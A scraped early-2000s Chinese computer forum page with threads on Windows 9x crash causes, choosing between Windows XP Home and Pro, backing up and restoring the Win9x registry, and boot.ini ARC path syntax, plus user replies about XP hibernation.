解决：在前面，曾讲过Windows 9x“内存管理”的概念，病毒软件运行过程中将不遵循这种方式，最终造成“非法操作”的出现。具体方法：对扫毒软件的升级，或者不用病毒防护。还可以不加载 Windows 9x的内存管理程序Emm386.exe。

5.由缓存设置不合理引起:
典型例子：极少出现的，没有规律可循。

解决：遵循缓存的设置规则：

(1)Win386.swp是Windows的“虚拟内存交换文件”，简单地说，就是拿一部分硬盘空间当作内存使用，先把一些内存中闲置太久的程序，放到硬盘上，等CPU要用的时候，再从硬盘的win386.swp里读出来。它的大小按物理内存的2倍来设置。(2)在Windows 98下，使用虚拟设备磁盘缓存Vcache。在“系统配置实用程序”中，找到sysytem.ini，再找到“[vcache]”小节，添入： MinFileCache=16384 MaxFileCache=16384 ChunkSize=512。上面的数值是以64MB为例采取的，一般原则是：物理内存×25%×512=VCache。(3)CD-ROMCache优化，注册表中“HKEY_LOCAL_MACHINE\Systm\CurrentControlSet\control\FileSystem\CDFS”，右边能看到“CacheSize”和“Prefetch”。如果你现在是使用Windows 98推荐的4倍速设置的话，它们的值应该是“0000026b”和“000000e4”，我们需要分开来修改这两个数值，我这里省略了计算方法，大家可以参考以下数据值，并根据自己的需要来修改吧，修改完后需要重新启动。

6.由系统资源匮乏引起:
典型例子：打印或保存时引起的“非法操作”。

解决：升级内存，加大缓存。移除一些不必要的软件，如：桌面主题、屏幕保护、计划任务、声音和输入法指示器、声卡的DOS驱动程序、防火墙、查毒软件、背景、Office 2000的竖式工具栏等等。最好是在启动微机后，先运行比较大的软件。还应加上一个良好的内存管理专家软件。

硬件方面
1.由系统及其系统部件过热引起:
典型例子：SDRAM的过热故障。

解决：选择好一点的散热片和散热风扇，风扇转速要高，散热片的散热面积要大，散热片材质要利于散热，与被散热部件的接触面积要大。内存的散热：现在市场上已经出现了内存的散热片，是一种长方形带圆孔的东西，但是散热体的体积过大，会影响到第二条SDRAM的插位，再就是应当注意机箱通风和不要超频。

2.由硬件质量不好引起:
典型例子：SDRAM的质量不稳定产生的“非法操作”。

解决：首先将BIOS中的内存参数设置得保守一些，如：SDRAM CAS LATENCY的值，设为CL=3。再就是不要超频，实在不行，只有更换内存了。

3.由硬件I/O冲突兼容性差引起:
典型例子：网卡的冲突。

解决：从设备管理中，删除带“?”或带“!”的设备，让系统重新识别一下硬件后，再安装驱动程序。I/O冲突的解决：查看“设备管理器/属性”中的“ 中断请求”，若有冲突，将它进行调整即可。再就是升级一下BIOS程序，也可以解决一些问题。

4.由硬件超频引起的“非法操作”:
典型例子：CPU和SDRAM超频故障。

解决：首先要保证自己的硬件有良好的可超性能，再就是要将散热的危害性降到最小程度，CPU表面温度控制在50℃以内，SDRAM最好在25℃左右。

5.由硬件损坏引起:
典型例子：包括一些接口的损坏，或者是小的电子元件被击穿。

解决：要有专门的仪器和方法来测试，一般很少出现。这里就不多讲了。

结论：上面讲到的，只不过是产生非法操作及解决的一些知识，它只是许多微机故障中的一个方面。下面，谈一谈为减少非法操作所应当知道的一些维护知识：

(1)对机房环境的维护：防尘避免高温、高湿度。

(2)看清故障，不要盲目处理，避免引发其他故障。

(3)做好接地，避免静电的危害。

(4)积极地吸取别人的好的建议，以增加对微机的掌握程度。

(5)定期地进行除尘、除湿的维护。

(6)注意软件版本的不断升级，以减少BUG的危害，增强功能。

(7)意木马冰河的防范、杀毒软件的更新。

(8)保持机箱的稳定性、避免不必要的振动、硬物的冲击。

(9)保持硬盘的数据整洁，定期运行管理软件，如：磁盘扫描、系统文件检查器、磁盘碎片整理、备份程序……

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-19 13:52:13 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
辛苦了

Blueidea Web Team.
Moderator Of Computer Technology Forum
欧阳文斌

初级用户
积分：4
发帖：1
来自：
注册：2002-02-22
 发表于 2002-02-22 09:13:02 按此观看欧阳文斌的个人资料 按此发邮件给欧阳文斌 发送悄悄话给欧阳文斌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看欧阳文斌的IP
好好玩

我是小小小黑客???!!!
上一贴 | 下一贴
快速回复 | 主题：关于系统崩溃，非法操作，大家都看看
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Windows XP选择 Pro还是 home～？

计算机技术
Windows XP选择 Pro还是 home～？

上一贴 | 下一贴
发表人 主题: Windows XP选择 Pro还是 home～？
鸵鸟γδξπηφ

高级用户
积分：219
发帖：56
来自：
注册：2002-01-27
 发表于 2002-01-29 08:56:29 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 收藏该主题供以后查看 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP
这篇文章我觉得很好 阐述了目前流行的 XP专业版与HOME版的选择问题！请大家看看。

winxp的简体中文专业版和家庭版价格相差三分之一，对于那些买正版的用户们来说，就有必要考虑一下买哪个版本，因为价格毕竟差很大。

    这两个版本的内核是一摸一样的，但 home 相对 professional（一下简称pro） 做了精简（其实不能简单地将它看作一个精简版本），那么到底在那些方面进行了“精简”呢？

    下面就逐一介绍，以备选择版本时参考。

    1、硬件支持

    · home 对硬件的支持不及 pro。pro支持“SMP”，就是说，pro 的系统可以有两个处理器一起工作，而 home 如果在两个处理器的机器上只用一个处理器；

    · home 不支持64位的处理器，而 pro 支持，在64位的处理器上，home是不工作的；

    · home 对多硬盘的支持跟 win9x 和 winme 是相仿的，而 pro 支持 “dynamic disks”(动态磁盘，继承至 win2k ），能够很好地处理多硬盘的机器，一个卷（就是我们讲的c盘，d盘这些逻辑盘）的物理空间可以不同的数个硬盘上，最多支持32个硬盘，盘符的分配也是动态自动识别的，不会出现以前需要高手解决的盘符错乱问题。

2，网络和安全支持
· home 不支持 IIS ，就是说，你的机器就不能作为网络服务器，也就意味着你的机器不能开ftp，也不能把网页在自己的机器上发布。pro 的 IIS 也不是默认安装，需要从安装盘补装。

    · home 在安全设置方面跟 pro 有很大的距离，home 是不支持文件加密系统的，也不支持“IPSec”，也不能进行复杂的文件访问权限设置。

    · home 不支持“远程桌面连接”。winxp 中有个有个新玩艺叫做“远程协助”，这个在两个版本的 winxp 中都有，它是用来提供远程帮助的，按照微软的说法，还可以用来做培训。“远程桌面连接”有别于“远程协助”，他提供给不同级别的访问者相应的权限进行访问，而访问者可以可以是windows系列里的任何一个版本。

    · home 的系统在网络中的地位与 pro 是不一样的，home 可以访问服务器和网路打印机，但是它不能成为一个“域”的成员，而 pro 就能。进而，pro 就能够使用基于域的的管理工具，比如“组策略”等。

    3、旧版升级

    在windows以前的版本中已经积累了大量工作的朋友，是不太愿意新装系统，并为此化大量的时间来把以前成千上万的文件备份好——虽然新装被认为有利于系统性能提高。那么 pro 和 home 在升级上有什么不同呢？ home 只能从 Windows 98, Windows 98SE, ， Windows ME 升级。而 pro 除了能从这些升级外还能从 Windows NT 4.0 Workstation, Windows 2000 Professional 和 winxp home 这个同门兄弟升级。

    win95 的朋友看到了，自己是不能直接升级了，不要慌，来个“两级跳”，比如，先升级到 win98，而后再升级到 xp。强行从 win95 升级也是能做到的，但要做一些处理。

    要指出的一点是，由于 win9x 的内核与 winxp 是不同的，能新装最好新装，而从NT内核的系统升级相对较好。

    4、硬件升级

    这个问题跟选择 pro 还是 home 倒没关系，但跟升级有关系，在这里一并讲清。许多朋友装xp时考虑一个硬件升级的问题，因为许多人都在传xp的要求系统盘3G，内存256M等等，其实，128M内存在大多数情况下是足够了。当然最好是256M。

    有一个经常被提起的疑问，就是如果现在还用128M，以后想升级倒256M时会不会遇到机器被“lock”，要去微软重新激活的麻烦？好像盛传会遇到麻烦。其实不是，微软也不至于这么没有人性的，他也知道许多人是要经常升级硬件的。一般的升级，比如加内存，加硬盘，换光驱等等都不会带来要重新激活的问题，但当你的硬件变化积累到一定程度（比如变化到几乎是换了台电脑）是有可能引起这种问题的。

    对硬件更换会产生“激活”问题的的恐慌大概是由卖硬件的人传播开的，原因不眼自明。

5、默认配置

    出于对两个版本设计对象上的不同，两个版本新装后的各种默认设置是有所不同的。一装完系统就能看到的比如 home 中任务栏是锁住的，而 pro 却相反；二者的设置要突出的重点不同，home 更强调多媒体等家庭常用和看重的工具；安装过程中，设置帐户的过程也是不同的，home 更简单,两个版本的帮助文档也是不相同的，home的内容要少一些，文字也不尽相同。

    看了上面的分析，大家一定心里有底了，但我在这里要提醒一点：很多人看到 home 有这么多“缺”，心里就想买个“全”的，这叫“宁滥勿缺”，其实对大多数家庭用户来说， home 的功能都用不完，你仔细想想，你每天在电脑上做的事就固定的那么几件，装 pro 也许适得其反 ，那些“全”的东西不仅“占”你的钱，还占电脑的资源，许多“优化xp”的技巧其实就是把那些“全”的减掉，何必呢？

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
上一贴 | 下一贴
快速回复 | 主题：Windows XP选择 Pro还是 home～？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


注册表完全恢复手册（因我本人非常喜欢注册表）

计算机技术
注册表完全恢复手册（因我本人非常喜欢注册表）

上一贴 | 下一贴
发表人 主题: 注册表完全恢复手册（因我本人非常喜欢注册表）
鸵鸟γδξπηφ

高级用户
积分：219
发帖：56
来自：
注册：2002-01-27
 发表于 2002-01-29 09:02:49 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 收藏该主题供以后查看 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP

注册表是伴随着Win95出现在我们面前的，其实它早就在NT中担当起了重要的作用。采用注册表来管理系统配置，主要是为了提高系统的稳定性。而系统出现的一些问题（如无法启动、应用程序无法运行、系统工作不正常等），很多都是因注册表出现错误而造成的，通过修改相应的错误数据就能使得Windows工作如初了。但注册表的结构太复杂，不正确的修改常常会带来更坏的结果。下面介绍几种安全恢复注册表的方法，希望能帮助大家远离令人头疼的注册表问题。

未 雨 绸 缪 篇

    Win9X系列操作系统的注册表，实际上是一个数据库，它以分层结构存储着整个计算机的系统配置以及大量应用程序的安装使用时要调用的各种信息等。它由3个相对独立的注册表文件组成：系统配置注册表文件：system.dat、用户平台配置注册表文件user.dat和网络管理注册表文件config.pol。它们存储在Windows目录中，其中system.dat中存储着当前计算机的配置，特别是各种即插即用设备的硬件配置，如设备的I/O地址、中断号（IRQ）以及DMA的值等；user.dat主要用来定义用户的优先权，存储着特定于某一用户的应用程序的安装信息等；而config.pol则是只有当Win98的用户安装了系统策略编辑器后才会生成的注册表文件，它存储的设置可以对网络用户的操作做出限制。一般而言，组成一个完整的注册表文件系统，system.dat和user.dat这两个文件是必不可少的。

    一、文件备份还原法

    显然，及时、正确的备份能够在计算机发生意外时，比较完全地恢复整个工作进程。对注册表进行的备份也一样，利用在正常工作状态下备份的注册表可以用来恢复发生错误的注册表，从而达到使系统重新恢复正常工作的目的。

    (一)备份

    1简单拷贝法

    备份注册表就是备份system.dat和user.dat这两个文件。它们的文件属性都是系统、隐藏、只读的，因此一般情况下无论在DOS还是Windows窗口状态都是不可见的，在备份时要注意使用一些“技术”。

    在DOS状态下，请先进入Windows目录，然后键入命令“Attrib －h －r －s system.dat”，对于user.dat同样操作，此时就可以将这两个文件复制到其他的目录中去了。

    在Windows窗口状态下，在【查看】中选择【文件夹选项】→【查看】，在【隐藏文件】中选择【显示所有文件】，这样system.dat和user.dat才能在文件夹窗口中显示出来。剩下的复制工作应该就不用我多说了吧。

    2注册表导出法

    将注册表导出，也是一种不错的注册表备份方法。在【开始】→【运行】栏中运行【Regedit.exe】，选【注册表】→【导出注册表】，最后选择导出注册表文件的存储位置就可以了。要注意的，在导出注册表时，千万要在【导出范围】中选择【全部】，否则导出的注册表文件不完全，将无法用来恢复原注册表。采用此方法备份后只生成一个文件，它的文件名的后缀是.reg。

    (二)还原

    1简单拷贝法的还原

    还原的方法当然是重新用备份的文件覆盖现有文件。不过要注意的是，在覆盖现有文件前，同样得先将system.dat和user.dat的文件属性全部取消，否则系统会拒绝覆盖操作。在还原前请务必启动到DOS状态下，然后再进行此操作。千万不要在Windows或Windows的DOS窗口下进行此还原操作，否则不但不能恢复注册表，反而会对注册表产生极大的破坏。

    2注册表导出法的还原

    利用注册表导出法的注册表文件还原系统时，既可以在Windows下进行，也可以在DOS下进行。 　　在Windows下进行时，运行注册表后选【注册表】→【导入注册表】，选择要导入注册表文件的所在位置，重新启动后就可以恢复注册表。虽然此法无论在安全模式还是正常方式下都可以进行，但为了保险起见，笔者还是建议最好在安全模式下或是干脆用下面介绍的在DOS下进行操作。 　　在DOS下只能以命令行的方式运行Regedit.exe，但它可以解决无法进入Windows情况下的注册表恢复问题。其命令行形式：

    Regedit [/L: system] [/R: user] filename1

    Regedit [/L: system] [/R: user] /C filename2

    Regedit [/L: system] [/R: user] /E filename3 regpath1

    Regedit [/L: system] [/R: user] /D regpath2

    参数含义：

    /L: system 指定system.dat文件的存放位置；

    /R: user 指定user.dat文件的存放位置；

    filename1 指定导入的注册表数据库文件名；

    /C filename2 利用指定的注册表文件重新生成注册表；

    /E filename3 导出注册表文件为指定文件名；

    regpath1 将指定开始关键字的部分从注册表文件中导出；

    /D regpath2 将指定开始关键字的部分从注册表文件中删除

    具体在恢复注册表时，可以采取命令行1的形式：Regedit bak.reg（假设你导出的备份注册表文件为此文件名）。不过建议采用命令行2的形式，即：Regedit /C bak.reg，因为此命令不但会将bak.reg中的所有信息导入注册表，而且会将其中的一些无用的信息（如一些已经被删除的程序在注册表中的残留部分关键字等）同时剔除，从而达到压缩重建注册表的目的。

    顺便提一下，命令行2也不一定要在恢复注册表才使用，平时运行也能压缩、清除注册表中的“垃圾”，从而起到提高Windows启动速度，减少注册表错误发生几率的作用。笔者就曾经利用此命令将原来6兆的注册表压缩为4兆。要注意的是，在使用此命令时，请务必在运行前加载磁盘缓冲smartdrv，否则它的运行时间之长或许足够你去看一场电影了！

    二、系统备份法

    正是由于注册表对于系统的重要性，微软在开发Win95时就考虑到系统对于注册表的自动备份问题。尽管它所提供的功能直到Win98才令人稍感满意，但毕竟这也不失为修复注册表的方法之一。

(一)Windows 95

    当初Win95各版本中提供的系统自动备份注册表的方法比较简单，通常是在Windows系统启动的同时，将当前的注册表文件备份。具体的做法就是将system.dat和user.dat这两个文件分别备份为相同属性的system.da0和user.da0。因此，当系统因注册表遭破坏无法启动时，可以手工将system.da0和user.da0这两个文件拷贝并覆盖system.dat和user.dat（请注意在操作前，分别将这4个文件的文件属性全部取消）。尽管这种想法不错，但由于疏忽和一些无法预料情况的发生，系统自动备份的注册表经常会在不知不觉中被破坏或备份失败。例如：①当注册表的破坏是在上 　　次关机以前发生的，而当你再次启动系统时，备份的注册表其实就是已经遭破坏的注册表的“完全”拷贝了；②启动时注册表为正确的，此时系统自动备份的注册表也是好的，但在系统启动过程中发生意外（如突然停电、硬盘意外读写错误等）导致系统启动失败，当你再次启动时，原来完整的注册表备份也会被已经遭破坏的注册表覆盖。因此，利用system.da0和user.da0这两个备份文件来恢复注册表的效果不是十分令人满意，成功率一般在50％左右。要注意在一次启动失败后，尽量不要试图再次启动，应该立即用system.da0和user.da0这两个文件来覆盖恢复，否则90％以上你的系统是再也无法恢复的了。

    (二)Windows 98

    Win98对注册表文件备份系统的改进之处主要体现在以下两个方面：①备份文件不仅包括system.dat和user.dat，还包括了system.ini和win.ini这两个初始化文件，大大提高了系统还原的完整性；②备份文件被统一地压缩在一个文件中，而且备份压缩文件的数量大大增加，避免了在Win95下一个备份容易发生错误无法恢复的现象。 　　Win98将注册表的备份文件放在了Windows下面的隐藏子目录Sysbckup中，备份文件以rbX为名，都是CAB格式的压缩文件，每个文件包含system.dat、user.dat 、system.ini和win.ini。默认情况下，系统共留有5个（X从000到004，如果某次有错误，数字往后顺延）压缩包备份，这5个压缩包备份分别是你最近5个工作日中第一次启动计算机时系统所做的备份。请注意，并不是最近5次，举个例子，如果你每天都使用计算机，那么这5个备份中保存的分别是5天来每天你第一次启动计算机时的注册表文件。当某次启动发生错误时，系统会将这时的注册表文件另外保存为rbbad.cab，以供使用者分析、寻找发生错误的原因所在。 　　了解了Win98的备份原理后，对于注册表的还原就比较轻松了。如果你可以进入Windows（哪怕是安全模式），想进行备份还原的话，只要用Winzip等支持CAB压缩格式的软件选择最近的或是前几天的备份压缩包文件，并将其中的4个文件解压出来，重新启动计算机到DOS状态，利用这些文件覆盖相应同名文件就可以了。如果你在启动的时候就无法进入Windows的话，那么可以尝试在DOS下进行备份还原工作：①利用Windows提供的extract.exe文件，用命令行方式将备份文件展开，直接对系统注册表文件进行覆盖还原（假设当前目录为Windows）：extract /Y . Sysbckup\ rbX.cab，其中X为000～004。②利用Windows附带的scanreg.exe，在DOS状态下运行此程序，按提示选择检查注册表，在程序检查完注册表后，可以看到【Create Backups】和【View Backups】这两项，前者用来将当前的注册表备份下来，后者用来查看以前备份的注册表情况。选择后者，屏幕将显示近日来的各备份注册表文件情况（主要是备份的时间），选择你想还原的备份，按回车，然后选择【Restore】开始还原，还原完毕后选择【Restart】重新启动计算机就可以了。

    注意，当你第一次启动计算机失败后，请不要不断地继续尝试启动计算机，因为scanreg.exe会将启动失败的注册表都一一依次备份下来，如果你连续启动失败5次的话，也就意味着原先备份的5个完好的注册表都将被这连续5次的坏注册表所替代，也就失去了利用它们来还原系统注册表的机会。因此，在启动失败后，请尽量不要一而再再而三地连续启动，应及时地进行注册表还原工作。

亡 羊 补 牢 篇

    古人云：亡羊补牢，为时未晚。如果你从来就没有备份注册表的习惯，或是在Windows下所有的系统自动备份都已经如前所述被已遭破坏的注册表文件所替代了的话，那么试试下面的方法，或许能使你的机器再次正常地运转起来。

一、保守还原法

    一般而言，当Win9X在成功安装完毕后，会自动将第一次正常运行时的系统信息（其实也就是注册表信息，主要是相应的硬件信息）保存在C盘根目录下的system.1st这个文件中。利用它，有可能将系统恢复到最初安装时的状态。具体的做法如下：在DOS下，首先去除system.1st以及Windows目录下system.dat的文件属性（它们都是系统、只读、隐藏属性），然后将system. 1st拷贝为system.dat来覆盖系统的system.dat，最后重新启动计算机。如果启动成功，还得对系统进行大幅度地调整才能恢复到破坏前的状态。

二、“李代桃僵”法

    如果有和你的硬件配置大致相同的计算机，可以用那台计算机上的注册表文件（system.dat和user.dat）来覆盖自己计算机上的注册表文件，然后启动。如果可以进入Windows，再对系统做相应的修改，就能恢复如初了。尽管这种方法成功的概率比较小（大约在25％左右），但这也是不得已而为之，或许能将你的“死马”真的医活了。 　　如果上面的招数对你都无效，那我再教你一记“超级绝招”——准备好你的Windows安装光盘，然后Setup吧！笔者凭着对注册表的了解（经常在里面修修改改）以及以上几大绝招，创造了自上年10月安装Win98至今没有重新安装的个人新记录。

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
上一贴 | 下一贴
快速回复 | 主题：注册表完全恢复手册（因我本人非常喜欢注册表）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


boot.ini文件解释

计算机技术
boot.ini文件解释

上一贴 | 下一贴
发表人 主题: boot.ini文件解释
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-12 23:30:16 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在写这篇文章前我特地搜索了一下经典的帖子，发现了啸转发的一篇帖子，是关于windows启动的。其中谈到了boot.ini，关于此文件，

我还想再补充一点，就是关于ARC命名规则的详细解释，了解这个，可以更好得编辑boot.ini用以管理windows的启动。

常见的boot.ini格式如下：

[boot loader]
timeout=10
default=multi(0)disk(0)rdisk(0)partition(2)\WINXP
[operating systems]
multi(X)disk(Y)rdisk(Z)partition(Q)\WINXP="Microsoft Windows XP Professional" /fastdetect
SCSI(X)disk(Y)rdisk(Z)partition(Q)\WIN98="Microsoft Windows 98" /fastdetect

其中[boot loader]在啸转发的帖子中已经有详细的介绍，这里就不再赘述。以下着重介绍[operating systems]部分。

1.partition(Q) 表示操作系统的系统根目录所在的分区在同一快硬盘上主分区的顺序号（Q从1开始）。
2.rdisk(Z) 若以multi开头，则Z植表示操作系统的系统根目录所在的分区所在的硬盘在同一个磁盘控制器上的硬盘顺序号（Z从0开始）。
若以SCSI开头，则Z值无意义，恒等于0。
3.disk(Y) 若以SCSI开头，则Y植表示操作系统的系统根目录所在的分区所在的硬盘在同一个磁盘控制器上的硬盘顺序号（Y从0开始）。
若以multi开头，则Y值无意义，恒等于0。
4.若计算机中既有IDE盘又有SCSI盘（或只有IDE），且BIOS中SCSI的设置设为enable，则以multi(X)开头，其中X表示操作系统的系统根目录所在的分区所在的硬盘所在的磁盘控制器在同一磁盘控制器上的顺序号（X从0开始计数）。
若计算机中只有SCSI控制器，则以SCSI(X)开头，其中X表示操作系统的系统根目录所在的分区所在的硬盘所在的磁盘控制器在同一磁盘控制器上的顺序号（X从0开始计数）。

PS：不知道你们有没有试过将timeout的值设为-1？结果是启动菜单停留不动，没有时间记时，直到你做出选择为止。

[这消息被ImHow编辑过(编辑时间2002-02-12 23:40:51)]

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 09:55:37 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
但是，改为-1有什么直接的用处呢？

另外，我听说XP有一秒钟关机的优点，
请问怎么实现呢？
是不是也要改这些文件呢？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-13 14:03:17 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
改为-1没有什么用的啊,好玩嘛
关于1秒钟关机，不知道你是不是指将关机时的状态保存在硬盘上,这个可以通过点击"关机"同时按住SHIFT实现

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 21:40:37 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
ImHow在上个帖子中说
引用:
你是不是指将关机时的状态保存在硬盘上

没有听懂！
说详细点！谢谢！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-14 01:28:21 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这是XP的一个新功能，就是说你如果这样做了（点击"关机"同时按住SHIFT），那么你下次启动计算机时就会直接返回到你上次关机的状态，速度非常快！

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 10:11:31 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
哦
收到！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2002-02-14 12:51:53 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
ImHow在上个帖子中说
引用:
PS：不知道你们有没有试过将timeout的值设为-1？结果是启动菜单停留不动，没有时间记时，直到你做出选择为止。

把timeout这行去掉，不知道是不是。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
kirsten9

终级用户
积分：516
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-14 14:16:05 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
ImHow在上个帖子中说
引用:
改为-1没有什么用的啊,好玩嘛
关于1秒钟关机，不知道你是不是指将关机时的状态保存在硬盘上,这个可以通过点击"关机"同时按住SHIFT实现

有些主板好像不支持？

{ KUka ALl wAYs wITh yOU }
YOUCHENG

初级用户
积分：141
发帖：31
来自：
注册：2001-02-08
 发表于 2002-02-14 19:00:30 按此观看YOUCHENG的个人资料 按此发邮件给YOUCHENG 访问YOUCHENG的主页 YOUCHENG 的 oicq 是7490241,查看 7490241 的资料 发送悄悄话给YOUCHENG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看YOUCHENG的IP
onlysnake在上个帖子中说
引用:
ImHow在上个帖子中说
引用:
你是不是指将关机时的状态保存在硬盘上

没有听懂！
说详细点！谢谢！

应该是休眠功能吧，只有支持ACPI的主板才可以做到，不过现在不支持ACPI的主板已经不多了。

晓松
kirsten9

终级用户
积分：516
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-14 20:14:38 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
YOUCHENG在上个帖子中说
引用:
onlysnake在上个帖子中说
引用:
ImHow在上个帖子中说
引用:
你是不是指将关机时的状态保存在硬盘上

没有听懂！
说详细点！谢谢！

应该是休眠功能吧，只有支持ACPI的主板才可以做到，不过现在不支持ACPI的主板已经不多了。

不是休眠

{ KUka ALl wAYs wITh yOU }
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-14 20:28:24 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
不是休眠，关于ACPI是以前所说的Suspand To Ram,而现在XP提供的功能是保存在硬盘上的。

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 21:27:04 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
保存在硬盘的什么地方？
是系统的文件夹吗？
还是其他的地方？？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
